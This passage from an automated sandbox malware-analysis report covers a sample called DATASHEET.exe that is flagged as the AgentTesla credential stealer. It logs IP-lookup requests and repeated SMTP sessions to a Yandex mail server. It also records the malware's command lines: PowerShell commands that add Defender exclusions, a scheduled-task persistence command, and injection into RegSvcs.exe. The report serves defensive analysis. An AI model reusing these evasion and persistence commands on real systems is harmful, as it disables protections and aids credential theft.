                                                                                                        Nov 21, 2024 09:08:23.421864986 CET5875002177.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:08:23.421875000 CET5875002177.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:08:23.421884060 CET5875002177.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:08:24.153413057 CET5875002277.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:08:24.199100018 CET50022587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:08:24.298882008 CET5875002177.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:08:24.339833021 CET50021587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:08:26.017354012 CET50021587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:08:26.136786938 CET5875002177.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:08:26.472608089 CET5875002177.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:08:26.472644091 CET5875002177.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:08:26.472713947 CET50021587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:08:26.473383904 CET50021587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:08:26.474332094 CET50023587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:08:26.592854023 CET5875002177.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:08:26.593781948 CET5875002377.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:08:26.594278097 CET50023587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:08:27.898350954 CET5875002377.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:08:27.930685997 CET50023587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:08:28.050297976 CET5875002377.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:08:28.388123989 CET5875002377.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:08:28.388322115 CET50023587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:08:28.508023977 CET5875002377.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:08:28.845633984 CET5875002377.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:08:28.846079111 CET50023587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:08:28.965959072 CET5875002377.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:08:29.305763960 CET5875002377.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:08:29.305790901 CET5875002377.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:08:29.305804968 CET5875002377.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:08:29.305836916 CET50023587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:08:29.305867910 CET5875002377.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:08:29.305919886 CET50023587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:08:29.308439016 CET50023587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:08:29.427990913 CET5875002377.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:08:29.767950058 CET5875002377.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:08:29.770518064 CET50023587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:08:29.892175913 CET5875002377.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:08:30.227816105 CET5875002377.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:08:30.434077978 CET50023587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:08:32.875091076 CET50023587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:08:32.876039028 CET50023587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:08:32.951505899 CET50024587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:08:32.994609118 CET5875002377.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:08:32.995898962 CET5875002377.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:08:32.995950937 CET50023587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:08:33.070997000 CET5875002477.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:08:33.071111917 CET50024587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:08:34.424320936 CET5875002477.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:08:34.464761019 CET50024587192.168.2.477.88.21.158

                                                                                                        UDP Packets

                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Nov 21, 2024 09:04:30.992007017 CET5295353192.168.2.41.1.1.1
                                                                                                        Nov 21, 2024 09:04:31.217710972 CET53529531.1.1.1192.168.2.4
                                                                                                        Nov 21, 2024 09:04:33.541250944 CET5093353192.168.2.41.1.1.1
                                                                                                        Nov 21, 2024 09:04:33.770169020 CET53509331.1.1.1192.168.2.4
                                                                                                        Nov 21, 2024 09:06:01.059825897 CET6021853192.168.2.41.1.1.1
                                                                                                        Nov 21, 2024 09:06:01.285835981 CET53602181.1.1.1192.168.2.4

                                                                                                        DNS Queries

                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                        Nov 21, 2024 09:04:30.992007017 CET192.168.2.41.1.1.10xca3eStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                        Nov 21, 2024 09:04:33.541250944 CET192.168.2.41.1.1.10x1b3fStandard query (0)smtp.yandex.ruA (IP address)IN (0x0001)false
                                                                                                        Nov 21, 2024 09:06:01.059825897 CET192.168.2.41.1.1.10x3dd8Standard query (0)smtp.yandex.ruA (IP address)IN (0x0001)false

                                                                                                        DNS Answers

                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                        Nov 21, 2024 09:04:31.217710972 CET1.1.1.1192.168.2.40xca3eNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                        Nov 21, 2024 09:04:31.217710972 CET1.1.1.1192.168.2.40xca3eNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                        Nov 21, 2024 09:04:31.217710972 CET1.1.1.1192.168.2.40xca3eNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                        Nov 21, 2024 09:04:33.770169020 CET1.1.1.1192.168.2.40x1b3fNo error (0)smtp.yandex.ru77.88.21.158A (IP address)IN (0x0001)false
                                                                                                        Nov 21, 2024 09:06:01.285835981 CET1.1.1.1192.168.2.40x3dd8No error (0)smtp.yandex.ru77.88.21.158A (IP address)IN (0x0001)false

                                                                                                        HTTP Request Dependency Graph

                                                                                                        • api.ipify.org

                                                                                                        HTTPS Proxied Packets

                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        0192.168.2.449733172.67.74.1524437808C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-11-21 08:04:32 UTC155OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                        Host: api.ipify.org
                                                                                                        Connection: Keep-Alive
                                                                                                        2024-11-21 08:04:32 UTC399INHTTP/1.1 200 OK
                                                                                                        Date: Thu, 21 Nov 2024 08:04:32 GMT
                                                                                                        Content-Type: text/plain
                                                                                                        Content-Length: 11
                                                                                                        Connection: close
                                                                                                        Vary: Origin
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8e5f2b68ac468c53-EWR
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1979&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=769&delivery_rate=1407228&cwnd=213&unsent_bytes=0&cid=c0ba05f765fee7dd&ts=448&x=0"
                                                                                                        2024-11-21 08:04:32 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 37 35
                                                                                                        Data Ascii: 8.46.123.75


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        1192.168.2.449737172.67.74.1524433608C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-11-21 08:04:36 UTC155OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                        Host: api.ipify.org
                                                                                                        Connection: Keep-Alive
                                                                                                        2024-11-21 08:04:36 UTC399INHTTP/1.1 200 OK
                                                                                                        Date: Thu, 21 Nov 2024 08:04:36 GMT
                                                                                                        Content-Type: text/plain
                                                                                                        Content-Length: 11
                                                                                                        Connection: close
                                                                                                        Vary: Origin
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8e5f2b800a7b4343-EWR
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1621&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2821&recv_bytes=769&delivery_rate=1800246&cwnd=252&unsent_bytes=0&cid=94ac60a3039a910e&ts=456&x=0"
                                                                                                        2024-11-21 08:04:36 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 37 35
                                                                                                        Data Ascii: 8.46.123.75


                                                                                                        SMTP Packets

                                                                                                        TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                        Nov 21, 2024 09:04:35.161896944 CET5874973677.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-45.sas.yp-c.yandex.net Ok 1732176274-Y4OSRA1OemI0
                                                                                                        Nov 21, 2024 09:04:38.966546059 CET5874973877.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-39.sas.yp-c.yandex.net Ok 1732176278-c4O9mB1OdKo0
                                                                                                        Nov 21, 2024 09:04:38.966829062 CET49738587192.168.2.477.88.21.158EHLO 377142
                                                                                                        Nov 21, 2024 09:04:39.414102077 CET5874973877.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-39.sas.yp-c.yandex.net
                                                                                                        250-8BITMIME
                                                                                                        250-PIPELINING
                                                                                                        250-SIZE 53477376
                                                                                                        250-STARTTLS
                                                                                                        250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                        250-DSN
                                                                                                        250 ENHANCEDSTATUSCODES
                                                                                                        Nov 21, 2024 09:04:39.414535999 CET49738587192.168.2.477.88.21.158STARTTLS
                                                                                                        Nov 21, 2024 09:04:39.863493919 CET5874973877.88.21.158192.168.2.4220 Go ahead
                                                                                                        Nov 21, 2024 09:06:02.661633015 CET5874983777.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-57.myt.yp-c.yandex.net Ok 1732176362-26OWct0OduQ0
                                                                                                        Nov 21, 2024 09:06:02.661860943 CET49837587192.168.2.477.88.21.158EHLO 377142
                                                                                                        Nov 21, 2024 09:06:03.106633902 CET5874983777.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-57.myt.yp-c.yandex.net
                                                                                                        250-8BITMIME
                                                                                                        250-PIPELINING
                                                                                                        250-SIZE 53477376
                                                                                                        250-STARTTLS
                                                                                                        250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                        250-DSN
                                                                                                        250 ENHANCEDSTATUSCODES
                                                                                                        Nov 21, 2024 09:06:03.106847048 CET49837587192.168.2.477.88.21.158STARTTLS
                                                                                                        Nov 21, 2024 09:06:03.551182985 CET5874983777.88.21.158192.168.2.4220 Go ahead
                                                                                                        Nov 21, 2024 09:06:12.571067095 CET5874985877.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-81.vla.yp-c.yandex.net Ok 1732176372-C6OSr61Ok4Y0
                                                                                                        Nov 21, 2024 09:06:12.571366072 CET49858587192.168.2.477.88.21.158EHLO 377142
                                                                                                        Nov 21, 2024 09:06:13.019005060 CET5874985877.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-81.vla.yp-c.yandex.net
                                                                                                        250-8BITMIME
                                                                                                        250-PIPELINING
                                                                                                        250-SIZE 53477376
                                                                                                        250-STARTTLS
                                                                                                        250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                        250-DSN
                                                                                                        250 ENHANCEDSTATUSCODES
                                                                                                        Nov 21, 2024 09:06:13.023081064 CET49858587192.168.2.477.88.21.158STARTTLS
                                                                                                        Nov 21, 2024 09:06:13.470551014 CET5874985877.88.21.158192.168.2.4220 Go ahead
                                                                                                        Nov 21, 2024 09:06:22.785233021 CET5874988377.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-77.klg.yp-c.yandex.net Ok 1732176382-M6O9k31Ok8c0
                                                                                                        Nov 21, 2024 09:06:22.817632914 CET49883587192.168.2.477.88.21.158EHLO 377142
                                                                                                        Nov 21, 2024 09:06:23.261871099 CET5874988377.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-77.klg.yp-c.yandex.net
                                                                                                        250-8BITMIME
                                                                                                        250-PIPELINING
                                                                                                        250-SIZE 53477376
                                                                                                        250-STARTTLS
                                                                                                        250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                        250-DSN
                                                                                                        250 ENHANCEDSTATUSCODES
                                                                                                        Nov 21, 2024 09:06:23.262167931 CET49883587192.168.2.477.88.21.158STARTTLS
                                                                                                        Nov 21, 2024 09:06:23.710091114 CET5874988377.88.21.158192.168.2.4220 Go ahead
                                                                                                        Nov 21, 2024 09:07:03.862814903 CET5874997577.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-55.vla.yp-c.yandex.net Ok 1732176423-37O3eD1OriE0
                                                                                                        Nov 21, 2024 09:07:03.863075972 CET49975587192.168.2.477.88.21.158EHLO 377142
                                                                                                        Nov 21, 2024 09:07:04.319263935 CET5874997577.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-55.vla.yp-c.yandex.net
                                                                                                        250-8BITMIME
                                                                                                        250-PIPELINING
                                                                                                        250-SIZE 53477376
                                                                                                        250-STARTTLS
                                                                                                        250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                        250-DSN
                                                                                                        250 ENHANCEDSTATUSCODES
                                                                                                        Nov 21, 2024 09:07:04.323275089 CET49975587192.168.2.477.88.21.158STARTTLS
                                                                                                        Nov 21, 2024 09:07:04.779500961 CET5874997577.88.21.158192.168.2.4220 Go ahead
                                                                                                        Nov 21, 2024 09:07:33.856005907 CET5875001677.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-59.iva.yp-c.yandex.net Ok 1732176453-X7OGmn0Oda60
                                                                                                        Nov 21, 2024 09:07:33.856590986 CET50016587192.168.2.477.88.21.158EHLO 377142
                                                                                                        Nov 21, 2024 09:07:34.315640926 CET5875001677.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-59.iva.yp-c.yandex.net
                                                                                                        250-8BITMIME
                                                                                                        250-PIPELINING
                                                                                                        250-SIZE 53477376
                                                                                                        250-STARTTLS
                                                                                                        250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                        250-DSN
                                                                                                        250 ENHANCEDSTATUSCODES
                                                                                                        Nov 21, 2024 09:07:34.315838099 CET50016587192.168.2.477.88.21.158STARTTLS
                                                                                                        Nov 21, 2024 09:07:34.774255037 CET5875001677.88.21.158192.168.2.4220 Go ahead
                                                                                                        Nov 21, 2024 09:07:38.333723068 CET5875001777.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-18.iva.yp-c.yandex.net Ok 1732176458-c7Onls0OgmI0
                                                                                                        Nov 21, 2024 09:07:38.335237026 CET50017587192.168.2.477.88.21.158EHLO 377142
                                                                                                        Nov 21, 2024 09:07:38.779526949 CET5875001777.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-18.iva.yp-c.yandex.net
                                                                                                        250-8BITMIME
                                                                                                        250-PIPELINING
                                                                                                        250-SIZE 53477376
                                                                                                        250-STARTTLS
                                                                                                        250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                        250-DSN
                                                                                                        250 ENHANCEDSTATUSCODES
                                                                                                        Nov 21, 2024 09:07:38.799910069 CET50017587192.168.2.477.88.21.158STARTTLS
                                                                                                        Nov 21, 2024 09:07:39.245603085 CET5875001777.88.21.158192.168.2.4220 Go ahead
                                                                                                        Nov 21, 2024 09:07:42.424019098 CET5875001877.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-31.sas.yp-c.yandex.net Ok 1732176462-g7O92H1Oq4Y0
                                                                                                        Nov 21, 2024 09:07:42.424226999 CET50018587192.168.2.477.88.21.158EHLO 377142
                                                                                                        Nov 21, 2024 09:07:42.895284891 CET5875001877.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-31.sas.yp-c.yandex.net
                                                                                                        250-8BITMIME
                                                                                                        250-PIPELINING
                                                                                                        250-SIZE 53477376
                                                                                                        250-STARTTLS
                                                                                                        250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                        250-DSN
                                                                                                        250 ENHANCEDSTATUSCODES
                                                                                                        Nov 21, 2024 09:07:42.895562887 CET50018587192.168.2.477.88.21.158STARTTLS
                                                                                                        Nov 21, 2024 09:07:43.362051964 CET5875001877.88.21.158192.168.2.4220 Go ahead
                                                                                                        Nov 21, 2024 09:07:51.414650917 CET5875001977.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-55.vla.yp-c.yandex.net Ok 1732176471-p7OW5E1Oj0U0
                                                                                                        Nov 21, 2024 09:07:51.414838076 CET50019587192.168.2.477.88.21.158EHLO 377142
                                                                                                        Nov 21, 2024 09:07:51.868935108 CET5875001977.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-55.vla.yp-c.yandex.net
                                                                                                        250-8BITMIME
                                                                                                        250-PIPELINING
                                                                                                        250-SIZE 53477376
                                                                                                        250-STARTTLS
                                                                                                        250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                        250-DSN
                                                                                                        250 ENHANCEDSTATUSCODES
                                                                                                        Nov 21, 2024 09:07:51.869266987 CET50019587192.168.2.477.88.21.158STARTTLS
                                                                                                        Nov 21, 2024 09:07:52.323471069 CET5875001977.88.21.158192.168.2.4220 Go ahead
                                                                                                        Nov 21, 2024 09:08:04.663883924 CET5875002077.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-84.iva.yp-c.yandex.net Ok 1732176484-48OMQl0Of0U0
                                                                                                        Nov 21, 2024 09:08:04.664189100 CET50020587192.168.2.477.88.21.158EHLO 377142
                                                                                                        Nov 21, 2024 09:08:05.126312017 CET5875002077.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-84.iva.yp-c.yandex.net
                                                                                                        250-8BITMIME
                                                                                                        250-PIPELINING
                                                                                                        250-SIZE 53477376
                                                                                                        250-STARTTLS
                                                                                                        250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                        250-DSN
                                                                                                        250 ENHANCEDSTATUSCODES
                                                                                                        Nov 21, 2024 09:08:05.138231993 CET50020587192.168.2.477.88.21.158STARTTLS
                                                                                                        Nov 21, 2024 09:08:05.600469112 CET5875002077.88.21.158192.168.2.4220 Go ahead
                                                                                                        Nov 21, 2024 09:08:18.173312902 CET5875002277.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-63.sas.yp-c.yandex.net Ok 1732176497-H8OOh61OrSw0
                                                                                                        Nov 21, 2024 09:08:18.173589945 CET50022587192.168.2.477.88.21.158EHLO 377142
                                                                                                        Nov 21, 2024 09:08:18.219363928 CET5875002177.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-39.myt.yp-c.yandex.net Ok 1732176498-H8OpQw0OeW20
                                                                                                        Nov 21, 2024 09:08:18.248502016 CET50021587192.168.2.477.88.21.158EHLO 377142
                                                                                                        Nov 21, 2024 09:08:18.615055084 CET5875002277.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-63.sas.yp-c.yandex.net
                                                                                                        250-8BITMIME
                                                                                                        250-PIPELINING
                                                                                                        250-SIZE 53477376
                                                                                                        250-STARTTLS
                                                                                                        250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                        250-DSN
                                                                                                        250 ENHANCEDSTATUSCODES
                                                                                                        Nov 21, 2024 09:08:18.644088030 CET50022587192.168.2.477.88.21.158STARTTLS
                                                                                                        Nov 21, 2024 09:08:18.697671890 CET5875002177.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-39.myt.yp-c.yandex.net
                                                                                                        250-8BITMIME
                                                                                                        250-PIPELINING
                                                                                                        250-SIZE 53477376
                                                                                                        250-STARTTLS
                                                                                                        250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                        250-DSN
                                                                                                        250 ENHANCEDSTATUSCODES
                                                                                                        Nov 21, 2024 09:08:18.701983929 CET50021587192.168.2.477.88.21.158STARTTLS
                                                                                                        Nov 21, 2024 09:08:19.086030960 CET5875002277.88.21.158192.168.2.4220 Go ahead
                                                                                                        Nov 21, 2024 09:08:19.150789022 CET5875002177.88.21.158192.168.2.4220 Go ahead
                                                                                                        Nov 21, 2024 09:08:27.898350954 CET5875002377.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-10.sas.yp-c.yandex.net Ok 1732176507-R8OjtM1OmOs0
                                                                                                        Nov 21, 2024 09:08:27.930685997 CET50023587192.168.2.477.88.21.158EHLO 377142
                                                                                                        Nov 21, 2024 09:08:28.388123989 CET5875002377.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-10.sas.yp-c.yandex.net
                                                                                                        250-8BITMIME
                                                                                                        250-PIPELINING
                                                                                                        250-SIZE 53477376
                                                                                                        250-STARTTLS
                                                                                                        250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                        250-DSN
                                                                                                        250 ENHANCEDSTATUSCODES
                                                                                                        Nov 21, 2024 09:08:28.388322115 CET50023587192.168.2.477.88.21.158STARTTLS
                                                                                                        Nov 21, 2024 09:08:28.845633984 CET5875002377.88.21.158192.168.2.4220 Go ahead
                                                                                                        Nov 21, 2024 09:08:34.424320936 CET5875002477.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-39.klg.yp-c.yandex.net Ok 1732176514-Y8OEaB1OkCg0

                                                                                                        Statistics

                                                                                                        CPU Usage

                                                                                                        Click to jump to process

                                                                                                        Memory Usage

                                                                                                        Click to jump to process

                                                                                                        High Level Behavior Distribution

                                                                                                        Click to dive into process behavior distribution

                                                                                                        Behavior

                                                                                                        Click to jump to process

                                                                                                        System Behavior

                                                                                                        General

                                                                                                        Target ID:0
                                                                                                        Start time:03:04:23
                                                                                                        Start date:21/11/2024
                                                                                                        Path:C:\Users\user\Desktop\DATASHEET.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\Desktop\DATASHEET.exe"
                                                                                                        Imagebase:0x900000
                                                                                                        File size:646'144 bytes
                                                                                                        MD5 hash:8B627084E10AD9B77436A4C3D8EA5EBB
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1781481952.0000000003CA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1781481952.0000000003CA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Reputation:low
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:2
                                                                                                        Start time:03:04:29
                                                                                                        Start date:21/11/2024
                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DATASHEET.exe"
                                                                                                        Imagebase:0x6a0000
                                                                                                        File size:433'152 bytes
                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:3
                                                                                                        Start time:03:04:29
                                                                                                        Start date:21/11/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:4
                                                                                                        Start time:03:04:29
                                                                                                        Start date:21/11/2024
                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exe"
                                                                                                        Imagebase:0x6a0000
                                                                                                        File size:433'152 bytes
                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:5
                                                                                                        Start time:03:04:29
                                                                                                        Start date:21/11/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:6
                                                                                                        Start time:03:04:29
                                                                                                        Start date:21/11/2024
                                                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwvzGqkYNEejno" /XML "C:\Users\user\AppData\Local\Temp\tmp8AFA.tmp"
                                                                                                        Imagebase:0xba0000
                                                                                                        File size:187'904 bytes
                                                                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:7
                                                                                                        Start time:03:04:29
                                                                                                        Start date:21/11/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:8
                                                                                                        Start time:03:04:29
                                                                                                        Start date:21/11/2024
                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                        Imagebase:0xd20000
                                                                                                        File size:45'984 bytes
                                                                                                        MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1805867621.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1805867621.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1800322328.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1800322328.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1805867621.0000000002FCC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:9
                                                                                                        Start time:03:04:30
                                                                                                        Start date:21/11/2024
                                                                                                        Path:C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exe
                                                                                                        Wow64 process (32bit):true
